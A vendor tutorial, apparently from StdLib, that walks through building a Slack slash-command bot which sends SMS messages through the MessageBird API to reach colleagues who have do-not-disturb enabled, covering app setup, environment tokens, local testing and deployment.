foreach(Int32 country in countryKey) Response.Write(country +"<br/>"); Where IList is the interface of System.Collection.IList IList countryValue = countrySList.GetValueList(); foreach (Int32 country in countryKey) Response.Write(country + "<br/>"); Hashtable in C# represents a collection of key/value pairs which maps keys to value. Any non-null object can be used as a key but a value can. We can retrieve items from hashTable to provide the key. Both keys and values are Objects. The main properties of HashTable are Key and Values and methods add (), remove (), contains () etc. Example: //make object of HashTable class like countryTable Hashtable countryTable = new Hashtable(); //Add the country in the hashtable.Add(Object key,Object value) countryTable.Add(1, "India"); countryTable.Add(2, "Srilanka"); countryTable.Add(3, "England"); //Find the key and value by using DictionaryEntry class foreach (DictionaryEntry country in countryTable) Response.Write(country.Key + " : " + country.Value +"<br/>"); Country List: 3 : England 2 : Srilanka 1 : India Detailed concept on hash table sees this link: It is worked as Last in first out (LIFO) when making the object of the stack class. Stack follow the two important method Push () and Pop (). Push () method is used for inserting the item and pop () method is used for the removing the data. Push () method Example: //make object of Stack class Stack countryStack = new Stack(); //Insert the item by push method countryStack.Push("India"); countryStack.Push("England"); //show the element in the stack foreach(string country in countryStack) Response.Write(country + "<br/>"); England India <![if !supportLineBreakNewLine]> Pop () method: //Remove the item from the list countryStack.Pop(); Queue work as first in first out (FIFO). Queue class has main method enqueue() and dequeue().Objects stored in a Queue are inserted at one end and removed from the other. The Queue provides additional insertion, extraction, and inspection operations. We can Enqueue (add) items in Queue and we can Dequeue (remove from Queue) or we can Peek (that is we will get the reference of first item) item from Queue. Queue accepts null reference as a valid value and allows duplicate elements. The main method and properties of the queue class are Enqueue(), Dequeue() and Peek() etc. Example: //make object of the queue class Queue countryQueue = new Queue(); //insert the item in queue by Enqueue method countryQueue.Enqueue("India"); countryQueue.Enqueue("England"); //remove the item in queue by Dequeue method countryQueue.Dequeue(); foreach (string country in countryQueue) Response.Write(country + "<br/>"); Its main properties are Next and Previous so it is allow the forward and reverse traversal by these properties and its main methods AddAfter(), AddFirst(), AddBefore(), AddHead(), AddLast() and AddTail.
http://www.mindstick.com/Articles/62f1e1b7-4f54-4d29-8c59-aa08d1190db1/Collection%20and%20Generic%20Collection%20Classes%20in%20C%20NET
CC-MAIN-2014-52
refinedweb
1,071
50.43
Step-by-Step learn JAXB Mapping Based on this Blog I began to learn JAXB-Mapping: This blog gives not every detail and I’m new comer in Java World, therefore it is not easy to finish complete scenario. After hard working I made it and would like to share my experience with you here. In the above link you can find theories about JAXB. Here I just show what I did in NWDS and PI. 1. 1. 2 external Definitions ED_EmpSource in Namespace:; and ED_EmpTarget in Namespace:. Why I do so? At beginning I tried to use Message Types within one namespace, but this makes some difficulties, i.e. variable names are same and conflict in the same package name. second reasons: the Error: “unable to marshal type because it is missing an @XmlRootElement annotation” For more information please refer to the article: Therefore the structure of the XSD should look as below: As As mentioned in this article: Make sure that the root element is an anonymous complex type and not an instance of a defined type. The Message Type in PI looks normally like this: With it you will encounter this XmlRootElement error. 2. 2. Finish PI Scenario in ESR with Service Interface, Message Mapping and Operation Mapping. The above activities are classic PI configuration. What I want to do is concat firstname and lastname into fullname when the country is “India” and I am going to use JAXB Mapping to replace graphic mapping. 3. 3. Export 2 external definitions in XSD files locally. 4. 4. Set up external tool in NWDS xjc: 5. 5. Create a new Java Project: JAXB_Test_Emp and import the following external jar libraries: 6. 6. Create 2 directories: sourceData and targetData 7. 7. Copy-paste XSDs into the corresponding directories. 8. 8. Using XJC to generate the required java classes related to the source and target XSD. The details of these operations: click on ource XSD and mark it and then start XJC: 9. 9. Make the generate java classes to Source in the project properties. After that the source and target directories are changed to internal source directory or packages, that you can call them in you java class. 10. 10. Create a new package “jaxbtest” and a new class “MM_JAXB_Mapping” 11. 11. The codes in MM_JAXB_Mapping Class look like this: 12. 12. Export the whole project as a jar file and save it locally. 13. 13.Import jar file as imported Archive into PI. 14. 14. Replace the Message-Mapping in the Operation Mapping with the new Imported Archive. 15.15. Test in the operation mapping So it works! Instead of using the xjc for generation, you can use the SAP graphical wizards. In ESR perspective, click the service interface Generate Client follow the wizard to generate the artifacts. sometimes it is necessary to mess with the classloader, otherwise the marshalling unmarshalling won’t work or it is impossinle to create jaxb context ClassLoader oldLoader = Thread.currentThread().getContextClassLoader(); try { Thread.currentThread().setContextClassLoader(this.getClass().getClassLoader()); // JAXB coding and mapping String contextPath = ItemType.class.getPackage().getName(); JAXBContext jc = JAXBContext.newInstance(contextPath); // more coding } finally { Thread.currentThread().setContextClassLoader(oldLoader); } using the wizard avoids using jaxb customizing which can be tricky
https://blogs.sap.com/2012/03/14/step-by-step-to-learn-java-mapping-with-jaxb/
CC-MAIN-2018-05
refinedweb
538
56.96
Evan's Weblog of Tech and Life Server2004-10-19T03:02:00ZNew location same old content more or less :-)<P><FONT face=Tahoma size=2>If.</FONT></P> <P><FONT face=Tahoma size=2 :-)</FONT></P> <P><FONT face=Tahoma size=2></FONT> </P><img src="" width="1" height="1">EvanF & Observation<p><font face="Tahoma"><font size="2">I haven't talked about methodology in a long time (at least not on here). I was recently in a conversation with someone about doing some research using a remote screen capture tool on a PC. The person (who shall remain nameless -- but you know who you are!) basically recruited participants to try out a build of a new concept for a particular software program and was using a tool that allows all of the interaction on the computer to be encoded to a video file that can be sent back over the internet. This way the researcher could watch a video of how the user interacted with the software while sitting back at her office.<?xml:namespace prefix = o<o:p></o:p></font></font></p> <p><font face="Tahoma" size="2">I happened upon her in her office when she was watching the video. During the video I noticed that there were gaps in the video, in that there was a pause in what the user was doing while in the midst of the task trying to be accomplished. We talked a little about what we had seen in the video, and I brought up this observation to her. She didn't think that it was all that relevant -- and I disagreed and suggested that unless she knew why the user wasn't finishing the activity in a continuous fashion, then she really didn’t really understand how the user was doing the task.</font></p> <p><font face="Tahoma" size="2">For example:< trying to get the task done and the kids were fighting in the background?< puzzled by what he were trying to do and just sat there trying to figure out what to click next?< asking someone for help?< forget what they were doing when he was returning to the task and thus sitting motionless for a while before starting up again?< really make errors as a result of not remembering where they were at in the task or were the errors the result of something else?</font></font></p> <p><font face="Tahoma"><font size="2">At this point she wasn’t very happy.<span style="mso-spacerun: yes"> </span>A lot of planning had gone into setting this study up and getting the software properly instrumented and set up for the participants.<span style="mso-spacerun: yes"> </span>At the time she was planning the study, it hadn’t dawned on her that the context in which the user is performing the tasks is as important as the task at hand.<span style="mso-spacerun: yes"> </span><i style="mso-bidi-font-style: normal">(Design solutions to address where to click next are much different than a solution focused on helping the user remember what they just did if they’re being distracted while performing the task.)<span style="mso-spacerun: yes"> </span></i></font></font></p> <p><font face="Tahoma" size="2">Technology is great, it can really help to better understand a situation, but if you’re not getting the full context then you’re missing a part of the bigger picture.<span style="mso-spacerun: yes"> </span>A lot of products are built in a vacuum, not because there’s missing data about the user, but rather they don’t take into account the larger ecosystem.<span style="mso-spacerun: yes"> </span>If you can capture the user in that context, when they’re doing a task you’re interested in, then you’ll have a much richer set of data about how to design a product.</font></p> <p> </p><img src="" width="1" height="1">EvanF onto something completely different<p><font face="Tahoma" size="2">Many.</font></p> <p><font face="Tahoma" size="2">All that said, I am going to start blogging again, but the content might be light or on topics that have little relation to much else, but that's par for the course on the web as we're all amateurs looking to be discovered :-)</font></p><img src="" width="1" height="1">EvanF's a party going on...<p><font face="Tahoma" size="2">There's a party going on right now. It's been a while in coming, but the momentum is finally building.....</font></p> <p><font face="Tahoma" size="2">The 1,000,000th Tablet PC was sold during February!</font></p> <p><font face="Tahoma" size="2"?</font></p> <p><font face="Tahoma" size="2">Well whoever it was, here's to you! Now it's on to the next 9 million. There's all kinds of interesting stuff being done for the platform... when are you going to buy one?</font></p><img src="" width="1" height="1">EvanF and small computers...<p>While my OQO still hasn't arrived, I was able to borrow one from someone on the team who isn't really using his and thus I wanted to give the device a workout during an event that was in theory designed for the device. Well let's just say I had some technical difficulties with the machine which I'm working on resolve.... but at the highest level and since MSFT is paying me to evaluate the device for now I'll just say that it's an interesting companion.</p> <p>But on to small computers.... There were 2 devices caught my eye, not from a mobility perspective but rather for a feature/function/size perspective for the home.</p> <p>First from <a href="">Aurora Multimedia</a> was the XPC Pro. This is a PC is a full function PC with video and surround sound capabilities in a package 8.5 x 1.75 x 13 with a built in DVD drive. They were showing it off as a second PC to attach to your TV etc, but I think that there are probably some other potential usages that are pretty interesting. However don't have a clue about the performance etc, so maybe I'll get to try one out</p> <p>Second was basically a complete DVD player/Stereo about the size of a car radio that can be mounted in a drive bay of a PC or used as a standalone component. This was the VPC-2000 from <a href="">Asour Technology</a>. This reminded me of the days that I worked for Compaq and we had designed a car stereo looking component in the front of the PC that did a lot of the same functions, but at the time was limited by Windows and ultimately failed since the actions didn't happen in real time. You would change the volume and 10 seconds later Windows would respond and then the volume would actually change. However in the implementation that I saw here, I thought it was a well integrated package that really does a great job at consolodating the functionality.</p> <p>One other interesting product was a thing called the Pocket Surfer from <a href="">Datawind</a>. This is basically a thin client that's about the size of a checkbook but really thin and light. It uses bluetooth to your cell phone and connects to a backend server to let you browse the internet. A much larger screen than a blackberry or most of the palm or ppc devices out there so it has some interesting applicational uses.</p> <p>I'll say more about my experiences with the OQO once I finish up my overall evaluation...</p><img src="" width="1" height="1">EvanF on a small computer...<p><font face="Tahoma" size="2"><a href="">Lora </a>and I exchanged some lengthy emails last night on this subject. Here's the one that kicked it off, basically indicating that my pricing structure was definitely off. While I later concede some of her points, there are some other factors involved that I'll just have to leave to your imagination...</font></p><font size="2"> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">Hey Evan,</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">Are your daughters going to use Linux? LOL You took me back in time. I felt like I was reading an article from 1999 or 2000 because of the hardware description.</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">I'm not sure that your costs are right. Was that Microsoft cost or real cost after import taxes, US sales office profit margin, then for sale?</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">You say $50 for the board, but let's use a board that is available en mass and people are doing what you described:</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">VIA EPIA-V8000A VIA C3, uses SDRAM, has audio, video, and LAN - Cost $88 in bulk; retails for $99 Case with Power supply - 90W minimum required - Cost somewhere around $50 - $100 depending on appearance and quality of power supply SDRAM memory - nonECC, unbuffered, 512MB - Cost $89 on open market, B or C grade, so it is a step up from toy grade Hard drive - 40GB for around $48 Windows XP Home $83 Total Cost $358 plus freight * 1.05 = $375</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">Wow the system builder just made $17. I'm sure they'll be thrilled. lol Of course, there is keyboard, mouse, optical drive, and display too. Even if the case and motherboard are sub $100, as you suggest, then you're still not any more competitive over current $399 systems. What's compelling about it?</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">If you want a $399 system, there are plenty to choose from, and some with quite a bit more processing power -- either AMD or Intel based. (Yes, then you have a fan.)</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">3) Remember, 5+ year old kids want streaming audio, streaming video, play games, play MP3s while chatting, chat, and more chat. Four year old technology can't handle this. Plus, they want USB 2.0, IR, and bluetooth to sync with their other gadgets. Run as much as a kid would, and then see if you think it's fast enough. Go to a few pre-teen sites, the javascript doll making sites, play iTunes, and have 5 chat windows open, plus homework, and then see if it's OK. Adults are usually more careful about what they open than kids.</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">4) Put it into a robot that can do the things 2-4 year old kids want and OK, I can rationalize it a little better then. Or, just use a smartphone and figure out a way to attach it to a monitor. Either of those ways are cheap and cute.</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"></font><font size="1">It's a tough product to sell, and a few companies like AJump, EWiz, Max Group, ASI, etc are building low cost, small boxes. Intel has repeatedly had a problem with microATX, VIA with miniITX, and now with the miniBTX. If anything, VIA with miniITX was able to ride the edge of custom systems and portable gaming machines for LAN parties, but these are not sub $400 systems. (Check out </font><A href=""><u><font color="#0000ff"><font size="1"></font></u></font></a><font size="2"><font size="1">)</font></p> <p dir="ltr" style="MARGIN-RIGHT: 0px"><font size="1">-- Lora</font></p> <p dir="ltr"><font face="Tahoma">She's right that it's easy to build a cheap"ish" system using commercially available parts, but of course you get what you pay for. But what if I was paying for a different value proposition to begin with? Could you make a market as big as the current PC industry with a different value proposition? Probably not. But maybe just maybe you could create something just a little special.</font></p></font><img src="" width="1" height="1">EvanF really small computer<p><font face="Tahoma" size="2">Over the last week, I've been playing with a development board from a chip manufacturer that is a relatively dated product in that it really isn't all that fast, doesn't use any cutting edge technology, but runs Windows XP at an acceptable level. Sure I'm not going to be going to play any games on this machine, but for doing my general work day in and day out, this is an awesome board.</font></p> <p><span style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"><font face="Tahoma">The dev board is about the size of a standard size hard drive, but the board has a ton of space on it and could easily be miniaturized to encompass less than the volume of a laptop drive! It has all the ports you'd expect USB, audio, VGA etc, but it runs at a very low processing speed compared to anything that you'd buy today. What I find really neat about this device is that there is no fan, the power supply is just about non-existent and I can put my hand right on the CPU while the machines been on for days on end. Okay so it's a little warm, but by no means is it burning hot.<?xml:namespace prefix = o<o:p></o:p></font></span></p> <p><span style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"><font face="Tahoma">Why do I like this little dev box so much? Well right now I have a second PC at home for my daughters to play games (things like Fredie Fish -- nothing that's a demanding application), but the cheap PC that I put together for them is just so noisy and takes up a lot of space. Just imagine if I built a PC around a board like this, plugged in an external CD (unpowered) and ran the USB cable up to the desk next to the keyboard. An ultra compact machine that does everything that I need it to do. <o:p></o:p></font></span></p> <p><span style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"><font face="Tahoma">But it gets better. The cost of the entire board and the existing housing of this device probably is clearly less than $100 maybe as close as $50. If someone were to manufacture this in volume, you could probably have a complete PC (keyboard, mouse, CD, HD, motherboard, etc.) that runs XP, Office and other standard apps plus general games (nothing ultra-intensive) for $100 for the entire package, software extra of course :-)<o:p></o:p></font></span></p> <p><span style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"><font face="Tahoma">Would you buy one? Line starts after me!</font></span></p><img src="" width="1" height="1">EvanF and Vegas<p><font face="Tahoma">So for the first time I actually get to go to Vegas for CES. Guess now that Comdex is dead, have to go for the major show. But speaking of shows, Vegas has a lot of them and I know nothing about the ins and outs of getting tickets for these shows. The reason I'm wondering is that my wife is going to come along with me and she most definitely wants to see a show. Probably a magic show or something like that, but what are the tricks to getting really good tickets for cheap prices? I'm figuring someone out there has the knowledge that google just barfs over giving a gazillion paid links for cheesy sites etc. Anyone with the inside scoop want to fill me in?</font></p><img src="" width="1" height="1">EvanF with MSN Spaces<p><font face="Tahoma">So I've set up a purely </font><a href=""><font face="Tahoma">personal blog</font></a><font face="Tahoma"> on MSN. The picture management capability is interesting as it's a lot easier than having my own website (which I haven't updated in eons). I'm thinking that maybe I'll give up my vanity domain and just simply use something like MSN Spaces for posting pictures of the family and kids and giving a quick update on what's going on. </font></p> <p><font face="Tahoma">A) It seems like it would be a lot less work to update</font></p> <p><font face="Tahoma">B) It's free (for the time being)</font></p> <p><font face="Tahoma">C) Is there a C?</font></p> <p><font face="Tahoma">Any thoughts on the potential downsides?</font></p><img src="" width="1" height="1">EvanF not on it's way :-(<p><font face="Tahoma">Well appears that the OQO that I had ordered, wasn't really ordered, so I'm not going to get a Hannukah present this year, maybe in time for New Years or perhaps in time to take it for a test run at CES. Having had a few minutes to look at the one that one of my co-workers is using (and is frustrated with) it seems to me that perhaps something like this on the floor of CES would be great particularly when paired with wireless connectivity (either via a cell phone or Wifi). However for CES a camera is real useful too (but no integrated camera). Of course I have to see whether or not this whole pariing of devices works out for this particular application; and of course there is that small little detail of cost-justification...</font></p> <p><font face="Tahoma">Oh well, I've got some other devices that I've got to do some more in depth evaluation of.</font></p><img src="" width="1" height="1">EvanF a second or third or fourth computer...<p><font face="Tahoma" size="2">I know almost everyone out there who will read this blog has more than 1 computer at their disposal already, so what I really want to know is if you were to give an additional computer to your brother, sister, mom, dad, great aunt Sally, or whomever who only has a single PC today, what would you want them to experience? That is to say, if you were to give them the computer what would you want them to get out of having this second computer that they don't get out of having the original computer that they already have. And if you were to do this, I want to know more than "it's a better computer" than the old one (in that you want to replace the old one with the new one) rather what benefit if any would there be to having these multiple computers for this particular person. Place yourself in their shoes, not your own, of course you want one machine to develop on, one machine to play on, one machine to experiment on, one machine to ...., but does your great aunt Sally?</font> </p><img src="" width="1" height="1">EvanF on it's way?<font face="Tahoma" size="2">So in my quest to have time on every small form factor machine out there and to figure out what the real end value is behind these devices, I did order an OQO. Appears it's somewhat backordered, as they got more orders than they expected -- which is either good news for them or that they produced a very small number to begin with and anything over that is more than they expected :-) Needless to say, I found </font><a href=""><font face="Tahoma" size="2">JK's comments</font></a><font face="Tahoma" size="2"> on what he's been seeing relative to this machine troubling. Particularly the comment about the digitizer. Getting these things to work well is tricky - all kinds of little things interfere with the accuracy of the electro-magnetic digitizer and if you look at the edges on any Tablet PC, you're bound to find a spot or two (or more) where the calibration is just off and you can't do much with it. What worries me here is that since the device is so small, there's only a very limited amount of space that a "human" can target and that will often be close to the edge on a device like this. Thus this would severely limit the overall usefulness of the digitizer itself. Guess we'll just have to wait and see when I get mine.</font><img src="" width="1" height="1">EvanF Wall - 1 : Evan - -5<p class="MsoNormal" style="MARGIN: 0in 0in 0pt"><font face="Tahoma"><font size="2">Well the day before last was a banner day for me... I went to hear a talk about innovation, left the talk to go out to the lobby, and smacked my head right into a glass wall. I must commend the janitors as it was the cleanest piece of glass I never saw. End result was that the glass wall is still standing, but I took 5 stitches above the eyebrow. Okay enough wallowing in self pity and utter embarrassment. Back to work...<span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"><?xml:namespace prefix = o<o:p></o:p></span></font></font></p><img src="" width="1" height="1">EvanF on Display...<p><font face="Tahoma" size="2">In my previous </font><A href=""><font face="Tahoma" size="2">post</font></a><font face="Tahoma" size="2">, :-)</font></p><img src="" width="1" height="1">EvanF Tablet...<div class="Section1"> <p><font size="2" face="Tahoma"><span style='font-size:11.0pt;font-family:Tahoma'>Well not exactly new, but new to me… This afternoon I was helping the Tablet User Research team clean out a storeroom where they’ve been keeping their equipment that was for studies. Interestingly enough there are all kinds of interesting tablets in there particularly for certain studies, but there’s also plenty of really old equipment such as pre-production Acer TM100s and some of the early prototypes that we used way back when. As we were going through I spotted this “<a href="">tablet</a>”. So it’s now in my possession. It’s a one of the kind Compaq Tablet that was created specifically for the announcement that Compaq was entering the tablet market. Of course it kind of looks like a giant ipaq, but it’s a real tablet and was nothing at all like what Compaq released. The secret to this tablet is that it’s really the same tablet as the prototypes we had been using, but a new “shell” was constructed around it to make this prototype seem real. Way back then while Compaq was already committed to entering the market, they didn’t want their ID revealed to the world, so it was all smoke and mirrors. A little piece of Tablet PC history, rescued from the storeroom…</span></font></p></div><img src="" width="1" height="1">EvanF
http://blogs.msdn.com/evanf/atom.xml
crawl-002
refinedweb
3,942
66.17
. To be more precisely, Blazor are two members of the ASP.NET Core family. On the one hand we have Blazor Server Side which actually is ASP.NET Core running on the server and on the other hand we have Blazor Client Side which looks like ASP.NET Core and is running on the browser inside a WebAssembly. Both frameworks share the same view framework, which is Razor Components. Both Frameworks may share the same view logic and business logic. Both frameworks are single page application (SPA) frameworks, there is no page reload from the server visible while browsing the application. Both frameworks look pretty similar up from the Program.cs Under the hood, both frameworks are hosted completely different. While Blazor Client Side is completely running on the Client, there is no web server needed. Blazor Server Side on the other hand is running upon a web server and is using WebSockets and a generic JavaScript client to simulate the same SPA behavior as Blazor Client Side. Hosting and Startup Within this post I'm trying to compare Blazor Server Side to the already known ASP.NET Core frameworks like MVC and Web API. First let's create a new Blazor Server Side project using the .NET Core 3 Preview 7 SDK: dotnet new blazorserverside -n BlazorServerSideDemo -o BlazorServerSideDemo cd BlazorServerSideDemo code . The second and third line changes the current directory to the project directory and opens it into Visual Studio Code, if it is installed. The first thing I usually do is to have a short glimpse into the Program.cs, but in this case this class looks completely equal to the other projects. There is absolutely no difference: public class Program { public static void Main(string[] args) { CreateHostBuilder(args).Build().Run(); } public static IHostBuilder CreateHostBuilder(string[] args) => Host.CreateDefaultBuilder(args) .ConfigureWebHostDefaults(webBuilder => { webBuilder.UseStartup<Startup>(); }); } At first a default IHostBuilder is created and upon this a IWebHostBuilder is created to spin up a Kestrel web server and to host a default ASP.NET Core application. Nothing spectacular here. The Startup.cs may be more special. Actually it looks like a common ASP.NET Core Startup class except there are different services registered and a different Middlewares is used:("/Home/Error"); app.UseHsts(); } app.UseHttpsRedirection(); app.UseStaticFiles(); app.UseRouting(); app.UseEndpoints(endpoints => { endpoints.MapBlazorHub(); endpoints.MapFallbackToPage("/_Host"); }); } } In the ConfigureServices method there are the Razor Pages added to the IoC container. Razor Pages is used to provide the page that is hosting the Blazor application. In this case it is the _Host.cshtml in the Pages directory. Every single page application (SPA) has at least one almost static page which is hosting the actual application that is running in the browser. React, Vue, Angular and so on have to have the same thing. It is a index.html that is loading all the JavaScripts and hosting the JavaScript application. In case of Blazor there is also a generic JavaScript running on the hosting page. This JavaScript will connect to a SignalR WebSocket that is running on the server side. Additional to the Razor Pages, the services needed for Blazor Server Side will be added to the IoC container. This services will be needed by the Blazor Hub which actually is the SignalR Hub that provides the WebSocket endpoint. The Configure also looks similar to the other ASP.NET Core frameworks. The only differences are in the last lines, where the Blazor Hub gets added and where the fallback page gets added. This fallback page actually is the hosting Razor Page mentioned before. Since the SPA supports deep links and created URLs for the different views created on the client, the application need to route to a fallback page in case the user directly navigates to client side route that is not existing on the server. So the server will just provide the hosting page and the client will load the right views depending on the URLs in the browser afterwards. Blazor The key feature of Blazor are the razor based components, which get interpreted on a runtime that understand C# and Razor and rendered on the client. With Blazor Client Side it the Mono runtime running inside the WebAssembly and on the Server Side version it is the .NET Core runtime running on the server. That means the Razor components get interpreted and rendered on the server. After that they get pushed to the client using SignalR and placed on the right place inside the hosting page using the generic JavaScript which is connected to the SignalR. So we have a server side rendered single page application, without any visible roundtrip to the server. The Razor components are also placed in the pages folder, but have the file extension .razor. Except the App.razor which is directly in the project directory. Those are the actual view components, which contain the logic of the application. If you have a more detailed look into the components, you'll see some similarities to React or Angular, in case you know those frameworks. I mentioned the App.razor which is the root component. Angular and React also have this kind of root component. Inside the Shared directory there is a MainLayout.razor, which is the layout component. (Also this kind of components are available in React and Angular.) All the other components in the pages directory are using this layout implicitly because it is set as the default layout in the _Imports.razor. Those components also define a route that is used to navigate to the component. Reusable components without a specific route are placed inside the Shared directory. Conclusion Even this is just a small introduction and overview about Blazor Server side, but I only want to quickly show the new ASP.NET Core 3.0 frameworks to create web applications. This is the last kind of normal server application I want to show. In the next part, I'm going to show Blazor Client side which uses a completely different hosting model. Blazor server side by the way is the new replacement for ASP.NET WebForms to create stateful web applications using C#. WebForms won't be migrated to ASP.NET Core. It will be supported in the same way as the full .NET Framework will be supported in the future. Which there will be no new versions and no new features in the future. With this new in mind, it absolutely makes sense to have a more detailed look into Blazor Server Side.
https://asp.net-hacker.rocks/2019/09/10/aspnetcore30-blazor-serverside.html
CC-MAIN-2019-39
refinedweb
1,084
57.77
Build an Emergency Notification Slack Bot in 10 Minutes with MessageBird, StdLib, and Node.js Slack bots can be a fun way for you to add functionality into your Slack workspace. Using StdLib you can easily connect APIs to your Slack Bot to create some amazing functionality — like using the MessageBird API to text messages. In just 10 minutes we will teach you how to build a simple Slack bot that can send a text message to a number using a simple Slack command. If you’re not familiar with StdLib yet, you’re in for a treat! We’re a serverless API development and publishing platform that can help you build and ship custom logic in record time. - 1x Slack Team - 1x Command Line Terminal - 10x Minutes (or 600x Seconds) - US Cell Phone Number But first…Let’s talk about Slash Commands. In Slack, slash commands make your users feel powerful. Simply type a slash command in the message field to perform your task in one easy step. Slack already has a bunch of in built commands. Check them out here. Two of my favorites are /me (display italicized action text, e.g. /me does a dance will display as “does a dance”) and /shrugs (Appends ¯_(ツ)/¯ to the end of your message). Another very useful one is /dnd which will (start or end a do not disturb session) With the do not disturb session Slack will automatically disable notifications and it will be harder to reach you. But what happens when you want to contact someone who has it enabled? This is where an emergency notification bot comes in handy! In just a few minutes we will teach you how to build an emergency notification bot. After making sure you are signed in to Slack, visit your Slack Apps page at. You’ll see a screen that looks like the following, depending on whether you have an existing apps. Simply click Create New App to create your app. You’ll be presented with a modal to enter in your App Name. I suggest DisturbBot since this application will be used to “disturb” members who may not want to be disturbed. From here, click Create App. After that find the Bot Users option on the left sidebar, under the Features heading. Click Add a Bot User to create your bot. You’ll be given an option to enter in the bot username. Click Add Bot User to complete the process, and that’s it! Your bot user is now added and ready to be used. With MessageBird API on StdLib, you can enjoy seamlessly adding SMS functionality (for customer communication, two-factor authentication and more) into your app using the world’s fastest global communication platform, MessageBird, with a simple, functional API on StdLib. But first you’ll need to do a few steps to initialize your first number. Visit in your browser. You should see a profile page that looks like the following: In order to get started, the first step is to initialize your first phone number, but first we’ll have to agree to the MessageBird terms of service. To do this, find the messagebird.numbers API on the right hand side of the screen and click on the name. Great, you found your way around StdLib profiles! (You even have your own generated when you create an account.) Now it’s time to initialize your first phone number, but first we’ll need to accept MessageBird’s Terms of Service (ToS). You should be on a page that looks like the following: This is the messagebird.numbers API reference page. If you can’t find this page, simply click here to visit it. From here, we can see a list of available API methods. (These are just things you can do with phone numbers!) Before we get started, you’ll notice a big orange notification (see above) indicating you need to accept a Terms of Service in order to use this API. Follow the on-screen instructions to accept. You should see a screen that asks you to claim a StdLib namespace (or if you already have one you can click “Already Registered”) and login there. When complete, you should see the following on the API page: Great! Now we can use all of MessageBird’s APIs. Let’s initialize that first number! Awesome. We’ve now accepted the MessageBird API’s ToS and we have a StdLib account to boot! Please make sure you’re on the numbers API Reference page before continuing: What you’re looking for is the available method. You can find it by scrolling down the page, or clicking available from the sidebar on the left. From here, we can see a code example and a big green button on the right that says Run Function. See the dropdown to the right of the “Run Function” button? There first thing we’ll want to do is select a Library Token. If you’re logged in (you should be!), clicking on the dropdown should yield something like this: Select a Library Token, and hit the Run Function button. You’ll be greeted with an output like the following: Don’t lose this! Pick a number that you like (out of the ones shown), and copy it to your clipboard. Now you’ll want to go back to the numbers.initialize API and paste your number the the number field in the documentation. If you can’t find the numbers.initialize API, simply click here:. Enter in your chosen number from the result of the numbers.available API above. Click Run Function, ensuring that the correct Library Token is selected from the Dropdown on the right (unauthenticated won’t work!). Congratulations! You have now received your first FREE number with the MessageBird API on StdLib. Additional numbers can be claimed for $0.99 from the numbers.claim API. If you’d like — you can try sending a message using the messagebird.sms API. Click here: and fill in the recipient (the number you want to send the message to) and the body (the text message you want to send) choose your Library Token and then run the function. If everything is set up correctly the specified recipient should receive a text message. Congratulations! You have just sent your first text message using StdLib and MessageBird. Open up your Terminal or Command Line and install the StdLib Command Line Tools with the following: $ when signing up for the MessageBird TOS. That’s it! You’ll now want to create a StdLib service for your Slack App. You can use the Slack source code to get a bot up and running with very little effort. In the stdlib directory you just created, type: $ lib create -s @slack/app You’ll be asked to enter a Service Name, we recommend disturbBotService. Open your env.json (environment variables) under <username>/disturbBotService in a text editor of your choice. We’ll be making modifications to the “local” and “dev” environment variables — make sure you’re modifying the right set! First, fetch your StdLib Token from your StdLib Dashboard. This is your StdLib library token. Click Show token to see its value and copy and paste it to your env.json file under STDLIBTOKEN in both the “dev” and “local” environment variables. Dev values are for your dev environment and release values should only be populated when releasing your application. Next, fill out SLACKAPPNAME, we recommend “Disturb Bot Test App”. Finally, go back to your Slack App, and scroll down on the Basic Information panel: Copy each of these values to dev section of env.json: SLACKCLIENTID, SLACKCLIENTSECRET, and SLACKVERFICIATIONTOKEN. As a last step, modify SLACK_REDIRECT to https://<username>.lib.id/disturbBotService@dev/auth/ where <username> is your StdLib username. To add or modify Slash commands, you’ll want to look in your StdLib Slack Source Code directory under <username>/disturbBotService/ functions/commands and create files with the name fucntions/commands/NAME.js where NAME is your intended command. Since I suggested /disturb as your command name, I also suggest you name your file: <username>/disturbBotService/functions/commands/disturb.js Fire up your favorite editor and copy the code below into that file. In your project directory where your package.json file is run: $ npm i -S libphonenumber-js This will install the npm module libphonenumber-js which is a really useful npm package that helps you parse phone numbers. To make sure your slack-app is ready, let’s run a test disturb command locally. Run this command below in your terminal (of course substituting the +11234567890 with the number of your choice). $ lib .commands.disturb test general "+11234567890 Wake up" The command emulates a @ test user executing /disturb +11234567890 Wake up in the channel #general. If everything is setup correctly it should send the message “Wake up!” to the number specified. Next, we’ll enable OAuth. On the sidebar menu, click OAuth & Permissions. Once there, you’ll want to enter in a Redirect URL as follows: https://<username>.lib.id/disturbBotService@dev/auth/ where <username> is your StdLib username. The first thing we will need to do is create our new /disturb command. Make sure you’re in your Slack App settings before continuing and then click Slash Commands on the sidebar. After clicking Create New Command, you’ll be asked to enter some command details, here’s what I recommend. - Command: /disturb - Request URL: https://<username>.lib.id/disturbBotService@dev/commands/:bg - Short Description: Sends a text to someone even if they are in dnd mode - Usage Hint: [phone] [message] e.g. 415-123-4567 Wake up! Slack has a great style guide you can use as a reference when naming commands. Deploying your function to the cloud can be done in one command $ lib up dev And just like that you have a simple Slack Bot that allows you to send text messages to people who may not want to be disturbed. Once complete, visit https://<username>.lib.id/disturbBotService@dev/ in your web browser — it should be available to be copy-and-pasted from your command line output. You’ll see a very simple “Add to Slack” button. Click this button, and accept the requested permissions (we set them up previously), you’ll have to scroll down and click Authorize. You’ll be returned to your specified auth callback, which should give a success message: You’re all done. Try it out! You should be able to send commands in the following format /disturb [phone-number] [message] This should send a emergency notification to the number specified. Check our website StdLib.com to join our Slack channel where you can let us know if you need any help and share with us what you are building next! Follow us on Twitter for more content and updates, @StdLibHQ. StdLib is your new API development solution, built atop serverless architecture for fast deployments and infinite scalability. To stay 